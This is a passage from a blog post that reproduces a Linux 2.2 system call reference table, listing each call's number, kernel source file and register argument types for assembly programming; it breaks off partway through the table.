src='https://blogger.googleusercontent.com/tracker/2598104819866870995-4461744213579023580?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-91863794887014389572012-02-21T11:45:00.000-08:002012-02-21T11:45:32.263-08:00kernel 2.2 syscall table for old hackers<h2>kernel 2.2 syscall table for old hackers</h2>The following table lists the system calls for the Linux 2.2 kernel. It could also be thought of as an API for the interface between user space and kernel space. My motivation for making this table was to make programming in assembly language easier when using only system calls and not the C library (for more information on this topic, go to <a href="http://www.linuxassembly.org/">http://www.linuxassembly.org</a>). On the left are the numbers of the system calls. This number will be put in register %eax. On the right of the table are the types of values to be put into the remaining registers before calling the software interrupt 'int 0x80'. After each syscall, an integer is returned in %eax. <br />For convenience, the kernel source file where each system call is located is linked to in the column labelled "Source". In order to use the hyperlinks, you must first copy this page to your own machine because the links take you directly to the source code on your system. You must have the kernel source installed (or linked from) under '/usr/src/linux' for this to work. <br /><table border="1"><tbody><tr><th>%eax</th><th>Name</th><th>Source</th> <th>%ebx</th><th>%ecx</th><th>%edx</th><th>%esx</th><th>%edi</th></tr><tr><td>1</td><td>sys_exit</td><td><a href="">kernel/exit.c</a></td> <td>int</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>2</td><td>sys_fork</td><td><a href="">arch/i386/kernel/process.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pt_regs">struct pt_regs</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>3</td><td>sys_read</td><td><a href="">fs/read_write.c</a></td> <td>unsigned int</td><td>char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td>-</td><td>-</td></tr><tr><td>4</td><td>sys_write</td><td><a href="">fs/read_write.c</a></td> <td>unsigned int</td><td>const char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td>-</td><td>-</td></tr><tr><td>5</td><td>sys_open</td><td><a href="">fs/open.c</a></td> <td>const char *</td><td>int</td><td>int</td><td>-</td><td>-</td></tr><tr><td>6</td><td>sys_close</td><td><a href="">fs/open.c</a></td> <td>unsigned int</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>7</td><td>sys_waitpid</td><td><a href="">kernel/exit.c</a></td> <td>pid_t</td><td>unsigned int *</td><td>int</td><td>-</td><td>-</td></tr><tr><td>8</td><td>sys_creat</td><td><a href="">fs/open.c</a></td> <td>const char *</td><td>int</td><td>-</td><td>-</td><td>-</td></tr><tr><td>9</td><td>sys_link</td><td><a href="">fs/namei.c</a></td> <td>const char *</td><td>const char *</td><td>-</td><td>-</td><td>-</td></tr><tr><td>10</td><td>sys_unlink</td><td><a href="">fs/namei.c</a></td> <td>const char *</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>11</td><td>sys_execve</td><td><a href="">arch/i386/kernel/process.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pt_regs">struct pt_regs</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>12</td><td>sys_chdir</td><td><a href="">fs/open.c</a></td> <td>const char *</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>13</td><td>sys_time</td><td><a href="">kernel/time.c</a></td> <td>int *</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>14</td><td>sys_mknod</td><td><a href="">fs/namei.c</a></td> <td>const char *</td><td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#dev_t">dev_t</a></td><td>-</td><td>-</td></tr><tr><td>15</td><td>sys_chmod</td><td><a href="">fs/open.c</a></td> <td>const char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#mode_t">mode_t</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>16</td><td>sys_lchown</td><td><a href="">fs/open.c</a></td> <td>const char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#gid_t">gid_t</a></td><td>-</td><td>-</td></tr><tr><td>18</td><td>sys_stat</td><td><a href="">fs/stat.c</a></td> <td>char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#__old_kernel_stat">struct __old_kernel_stat *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>19</td><td>sys_lseek</td><td><a href="">fs/read_write.c</a></td> <td>unsigned int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#off_t">off_t</a></td><td>unsigned int</td><td>-</td><td>-</td></tr><tr><td>20</td><td>sys_getpid</td><td><a href="">kernel/sched.c</a></td> <td>-</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>21</td><td>sys_mount</td><td><a href="">fs/super.c</a></td> <td>char *</td><td>char *</td><td>char *</td><td>-</td><td>-</td></tr><tr><td>22</td><td>sys_oldumount</td><td><a href="">fs/super.c</a></td> <td>char *</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>23</td><td>sys_setuid</td><td><a href="">kernel/sys.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>24</td><td>sys_getuid</td><td><a href="">kernel/sched.c</a></td> <td>-</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>25</td><td>sys_stime</td><td><a href="">kernel/time.c</a></td> <td>int *</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>26</td><td>sys_ptrace</td><td><a href="">arch/i386/kernel/ptrace.c</a></td> <td>long</td><td>long</td><td>long</td><td>long</td><td>-</td></tr><tr><td>27</td><td>sys_alarm</td><td><a href="">kernel/sched.c</a></td> <td>unsigned int</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>28</td><td>sys_fstat</td><td><a href="">fs/stat.c</a></td> <td>unsigned int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#__old_kernel_stat">struct __old_kernel_stat *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>29</td><td>sys_pause</td><td><a href="">arch/i386/kernel/sys_i386.c</a></td> <td>-</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>30</td><td>sys_utime</td><td><a href="">fs/open.c</a></td> <td>char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#utimbuf">struct utimbuf *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>33</td><td>sys_access</td><td><a href="">fs/open.c</a></td> <td>const char *</td><td>int</td><td>-</td><td>-</td><td>-</td></tr><tr><td>34</td><td>sys_nice</td><td><a href="">kernel/sched.c</a></td> <td>int</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>36</td><td>sys_sync</td><td><a href="">fs/buffer.c</a></td> <td>-</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>37</td><td>sys_kill</td><td><a href="">kernel/signal.c</a></td> <td>int</td><td>int</td><td>-</td><td>-</td><td>-</td></tr><tr><td>38</td><td>sys_rename</td><td><a href="">fs/namei.c</a></td> <td>const char *</td><td>const char *</td><td>-</td><td>-</td><td>-</td></tr><tr><td>39</td><td>sys_mkdir</td><td><a href="">fs/namei.c</a></td> <td>const char *</td><td>int</td><td>-</td><td>-</td><td>-</td></tr><tr><td>40</td><td>sys_rmdir</td><td><a href="">fs/namei.c</a></td> <td>const char *</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>41</td><td>sys_dup</td><td><a href="">fs/fcntl.c</a></td> <td>unsigned int</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>42</td><td>sys_pipe</td><td><a href="">arch/i386/kernel/sys_i386.c</a></td> <td>unsigned long *</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>43</td><td>sys_times</td><td><a href="">kernel/sys.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#tms">struct tms *</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>45</td><td>sys_brk</td><td><a href="">mm/mmap.c</a></td> <td>unsigned long</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>46</td><td>sys_setgid</td><td><a href="">kernel/sys.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#gid_t">gid_t</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>47</td><td>sys_getgid</td><td><a href="">kernel/sched.c</a></td> <td>-</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>48</td><td>sys_signal</td><td><a href="">kernel/signal.c</a></td> <td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#__sighandler_t">__sighandler_t</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>49</td><td>sys_geteuid</td><td><a href="">kernel/sched.c</a></td> <td>-</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>50</td><td>sys_getegid</td><td><a href="">kernel/sched.c</a></td> <td>-</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>51</td><td>sys_acct</td><td><a href="">kernel/acct.c</a></td> <td>const char *</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>52</td><td>sys_umount</td><td><a href="">fs/super.c</a></td> <td>char *</td><td>int</td><td>-</td><td>-</td><td>-</td></tr><tr><td>54</td><td>sys_ioctl</td><td><a href="">fs/ioctl.c</a></td> <td>unsigned int</td><td>unsigned int</td><td>unsigned long</td><td>-</td><td>-</td></tr><tr><td>55</td><td>sys_fcntl</td><td><a href="">fs/fcntl.c</a></td> <td>unsigned int</td><td>unsigned int</td><td>unsigned long</td><td>-</td><td>-</td></tr><tr><td>57</td><td>sys_setpgid</td><td><a href="">kernel/sys.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pid_t">pid_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pid_t">pid_t</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>59</td><td>sys_olduname</td><td><a href="">arch/i386/kernel/sys_i386.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#oldold_utsname">struct oldold_utsname *</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>60</td><td>sys_umask</td><td><a href="">kernel/sys.c</a></td> <td>int</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>61</td><td>sys_chroot</td><td><a href="">fs/open.c</a></td> <td>const char *</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>62</td><td>sys_ustat</td><td><a href="">fs/super.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#dev_t">dev_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#ustat">struct ustat *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>63</td><td>sys_dup2</td><td><a href="">fs/fcntl.c</a></td> <td>unsigned int</td><td>unsigned int</td><td>-</td><td>-</td><td>-</td></tr><tr><td>64</td><td>sys_getppid</td><td><a href="">kernel/sched.c</a></td> <td>-</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>65</td><td>sys_getpgrp</td><td><a href="">kernel/sys.c</a></td> <td>-</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>66</td><td>sys_setsid</td><td><a href="">kernel/sys.c</a></td> <td>-</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>67</td><td>sys_sigaction</td><td><a href="">arch/i386/kernel/signal.c</a></td> <td>int</td><td>const <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#old_sigaction">struct old_sigaction *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#old_sigaction">struct old_sigaction *</a></td><td>-</td><td>-</td></tr><tr><td>68</td><td>sys_sgetmask</td><td><a href="">kernel/signal.c</a></td> <td>-</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>69</td><td>sys_ssetmask</td><td><a href="">kernel/signal.c</a></td> <td>int</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>70</td><td>sys_setreuid</td><td><a href="">kernel/sys.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>71</td><td>sys_setregid</td><td><a href="">kernel/sys.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#gid_t">gid_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#gid_t">gid_t</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>72</td><td>sys_sigsuspend</td><td><a href="">arch/i386/kernel/signal.c</a></td> <td>int</td><td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#old_sigset_t">old_sigset_t</a></td><td>-</td><td>-</td></tr><tr><td>73</td><td>sys_sigpending</td><td><a href="">kernel/signal.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#old_sigset_t">old_sigset_t *</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>74</td><td>sys_sethostname</td><td><a href="">kernel/sys.c</a></td> <td>char *</td><td>int</td><td>-</td><td>-</td><td>-</td></tr><tr><td>75</td><td>sys_setrlimit</td><td><a href="">kernel/sys.c</a></td> <td>unsigned int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#rlimit">struct rlimit *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>76</td><td>sys_getrlimit</td><td><a href="">kernel/sys.c</a></td> <td>unsigned int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#rlimit">struct rlimit *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>77</td><td>sys_getrusage</td><td><a href="">kernel/sys.c</a></td> <td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#rusage">struct rusage *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>78</td><td>sys_gettimeofday</td><td><a href="">kernel/time.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timeval">struct timeval *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timezone">struct timezone *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>79</td><td>sys_settimeofday</td><td><a href="">kernel/time.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timeval">struct timeval *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timezone">struct timezone *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>80</td><td>sys_getgroups</td><td><a href="">kernel/sys.c</a></td> <td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#gid_t">gid_t *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>81</td><td>sys_setgroups</td><td><a href="">kernel/sys.c</a></td> <td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#gid_t">gid_t *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>82</td><td>old_select</td><td><a href="">arch/i386/kernel/sys_i386.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#sel_arg_struct">struct sel_arg_struct *</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>83</td><td>sys_symlink</td><td><a href="">fs/namei.c</a></td> <td>const char *</td><td>const char *</td><td>-</td><td>-</td><td>-</td></tr><tr><td>84</td><td>sys_lstat</td><td><a href="">fs/stat.c</a></td> <td>char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#__old_kernel_stat">struct __old_kernel_stat *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>85</td><td>sys_readlink</td><td><a href="">fs/stat.c</a></td> <td>const char *</td><td>char *</td><td>int</td><td>-</td><td>-</td></tr><tr><td>86</td><td>sys_uselib</td><td><a href="">fs/exec.c</a></td> <td>const char *</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>87</td><td>sys_swapon</td><td><a href="">mm/swapfile.c</a></td> <td>const char *</td><td>int</td><td>-</td><td>-</td><td>-</td></tr><tr><td>88</td><td>sys_reboot</td><td><a href="">kernel/sys.c</a></td> <td>int</td><td>int</td><td>int</td><td>void *</td><td>-</td></tr><tr><td>89</td><td>old_readdir</td><td><a href="">fs/readdir.c</a></td> <td>unsigned int</td><td>void *</td><td>unsigned int</td><td>-</td><td>-</td></tr><tr><td>90</td><td>old_mmap</td><td><a href="">arch/i386/kernel/sys_i386.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#mmap_arg_struct">struct mmap_arg_struct *</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>91</td><td>sys_munmap</td><td><a href="">mm/mmap.c</a></td> <td>unsigned long</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>92</td><td>sys_truncate</td><td><a href="">fs/open.c</a></td> <td>const char *</td><td>unsigned long</td><td>-</td><td>-</td><td>-</td></tr><tr><td>93</td><td>sys_ftruncate</td><td><a href="">fs/open.c</a></td> <td>unsigned int</td><td>unsigned long</td><td>-</td><td>-</td><td>-</td></tr><tr><td>94</td><td>sys_fchmod</td><td><a href="">fs/open.c</a></td> <td>unsigned int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#mode_t">mode_t</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>95</td><td>sys_fchown</td><td><a href="">fs/open.c</a></td> <td>unsigned int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#gid_t">gid_t</a></td><td>-</td><td>-</td></tr><tr><td>96</td><td>sys_getpriority</td><td><a href="">kernel/sys.c</a></td> <td>int</td><td>int</td><td>-</td><td>-</td><td>-</td></tr><tr><td>97</td><td>sys_setpriority</td><td><a href="">kernel/sys.c</a></td> <td>int</td><td>int</td><td>int</td><td>-</td><td>-</td></tr><tr><td>99</td><td>sys_statfs</td><td><a href="">fs/open.c</a></td> <td>const char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#statfs">struct statfs *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>100</td><td>sys_fstatfs</td><td><a href="">fs/open.c</a></td> <td>unsigned int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#statfs">struct statfs *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>101</td><td>sys_ioperm</td><td><a href="">arch/i386/kernel/ioport.c</a></td> <td>unsigned long</td><td>unsigned long</td><td>int</td><td>-</td><td>-</td></tr><tr><td>102</td><td>sys_socketcall</td><td><a href="">net/socket.c</a></td> <td>int</td><td>unsigned long *</td><td>-</td><td>-</td><td>-</td></tr><tr><td>103</td><td>sys_syslog</td><td><a href="">kernel/printk.c</a></td> <td>int</td><td>char *</td><td>int</td><td>-</td><td>-</td></tr><tr><td>104</td><td>sys_setitimer</td><td><a href="">kernel/itimer.c</a></td> <td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#itimerval">struct itimerval *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#itimerval">struct itimerval *</a></td><td>-</td><td>-</td></tr><tr><td>105</td><td>sys_getitimer</td><td><a href="">kernel/itimer.c</a></td> <td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#itimerval">struct itimerval *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>106</td><td>sys_newstat</td><td><a href="">fs/stat.c</a></td> <td>char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#stat">struct stat *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>107</td><td>sys_newlstat</td><td><a href="">fs/stat.c</a></td> <td>char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#stat">struct stat *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>108</td><td>sys_newfstat</td><td><a href="">fs/stat.c</a></td> <td>unsigned int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#stat">struct stat *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>109</td><td>sys_uname</td><td><a href="">arch/i386/kernel/sys_i386.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#old_utsname">struct old_utsname *</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>110</td><td>sys_iopl</td><td><a href="">arch/i386/kernel/ioport.c</a></td> <td>unsigned long</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>111</td><td>sys_vhangup</td><td><a href="">fs/open.c</a></td> <td>-</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>112</td><td>sys_idle</td><td><a href="">arch/i386/kernel/process.c</a></td> <td>-</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>113</td><td>sys_vm86old</td><td><a href="">arch/i386/kernel/vm86.c</a></td> <td>unsigned long</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#vm86plus_struct">struct vm86plus_struct *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>114</td><td>sys_wait4</td><td><a href="">kernel/exit.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pid_t">pid_t</a></td><td>unsigned long *</td><td>int options</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#rusage">struct rusage *</a></td><td>-</td></tr><tr><td>115</td><td>sys_swapoff</td><td><a href="">mm/swapfile.c</a></td> <td>const char *</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>116</td><td>sys_sysinfo</td><td><a href="">kernel/info.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#sysinfo">struct sysinfo *</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>117</td><td>sys_ipc <a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#note117">(*Note)</a></td><td><a href="">arch/i386/kernel/sys_i386.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uint">uint</a></td><td>int</td><td>int</td><td>int</td><td>void *</td></tr><tr><td>118</td><td>sys_fsync</td><td><a href="">fs/buffer.c</a></td> <td>unsigned int</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>119</td><td>sys_sigreturn</td><td><a href="">arch/i386/kernel/signal.c</a></td> <td>unsigned long</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>120</td><td>sys_clone</td><td><a href="">arch/i386/kernel/process.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pt_regs">struct pt_regs</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>121</td><td>sys_setdomainname</td><td><a href="">kernel/sys.c</a></td> <td>char *</td><td>int</td><td>-</td><td>-</td><td>-</td></tr><tr><td>122</td><td>sys_newuname</td><td><a href="">kernel/sys.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#new_utsname">struct new_utsname *</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>123</td><td>sys_modify_ldt</td><td><a href="">arch/i386/kernel/ldt.c</a></td> <td>int</td><td>void *</td><td>unsigned long</td><td>-</td><td>-</td></tr><tr><td>124</td><td>sys_adjtimex</td><td><a href="">kernel/time.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timex">struct timex *</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>125</td><td>sys_mprotect</td><td><a href="">mm/mprotect.c</a></td> <td>unsigned long</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td>unsigned long</td><td>-</td><td>-</td></tr><tr><td>126</td><td>sys_sigprocmask</td><td><a href="">kernel/signal.c</a></td> <td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#old_sigset_t">old_sigset_t *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#old_sigset_t">old_sigset_t *</a></td><td>-</td><td>-</td></tr><tr><td>127</td><td>sys_create_module</td><td><a href="">kernel/module.c</a></td> <td>const char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>128</td><td>sys_init_module</td><td><a href="">kernel/module.c</a></td> <td>const char *</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#module">struct module *</a></td><td>-</td><td>-</td><td>-</td></tr><tr><td>129</td><td>sys_delete_module</td><td><a href="">kernel/module.c</a></td> <td>const char *</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>130</td><td>sys_get_kernel_syms</td><td><a href="">kernel/module.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#kernel_sym">struct kernel_sym *</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>131</td><td>sys_quotactl</td><td><a href="">fs/dquot.c</a></td> <td>int</td><td>const char *</td><td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#caddr_t">caddr_t</a></td><td>-</td></tr><tr><td>132</td><td>sys_getpgid</td><td><a href="">kernel/sys.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#pid_t">pid_t</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>133</td><td>sys_fchdir</td><td><a href="">fs/open.c</a></td> <td>unsigned int</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>134</td><td>sys_bdflush</td><td><a href="">fs/buffer.c</a></td> <td>int</td><td>long</td><td>-</td><td>-</td><td>-</td></tr><tr><td>135</td><td>sys_sysfs</td><td><a href="">fs/super.c</a></td> <td>int</td><td>unsigned long</td><td>unsigned long</td><td>-</td><td>-</td></tr><tr><td>136</td><td>sys_personality</td><td><a href="">kernel/exec_domain.c</a></td> <td>unsigned long</td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>138</td><td>sys_setfsuid</td><td><a href="">kernel/sys.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#uid_t">uid_t</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>139</td><td>sys_setfsgid</td><td><a href="">kernel/sys.c</a></td> <td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#gid_t">gid_t</a></td><td>-</td><td>-</td><td>-</td><td>-</td></tr><tr><td>140</td><td>sys_llseek</td><td><a href="">fs/read_write.c</a></td> <td>unsigned int</td><td>unsigned long</td><td>unsigned long</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#loff_t">loff_t *</a></td><td>unsigned int</td></tr><tr><td>141</td><td>sys_getdents</td><td><a href="">fs/readdir.c</a></td> <td>unsigned int</td><td>void *</td><td>unsigned int</td><td>-</td><td>-</td></tr><tr><td>142</td><td>sys_select</td><td><a href="">fs/select.c</a></td> <td>int</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#fd_set">fd_set *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#fd_set">fd_set *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#fd_set">fd_set *</a></td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#timeval">struct timeval *</a></td></tr><tr><td>143</td><td>sys_flock</td><td><a href="">fs/locks.c</a></td> <td>unsigned int</td><td>unsigned int</td><td>-</td><td>-</td><td>-</td></tr><tr><td>144</td><td>sys_msync</td><td><a href="">mm/filemap.c</a></td> <td>unsigned long</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#size_t">size_t</a></td><td>int</td><td>-</td><td>-</td></tr><tr><td>145</td><td>sys_readv</td><td><a href="">fs/read_write.c</a></td> <td>unsigned long</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#iovec">const struct iovec *</a></td><td>unsigned long</td><td>-</td><td>-</td></tr><tr><td>146</td><td>sys_writev</td><td><a href="">fs/read_write.c</a></td> <td>unsigned long</td><td><a href="http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html#iovec">const struct iovec *</a></td><td>unsigned 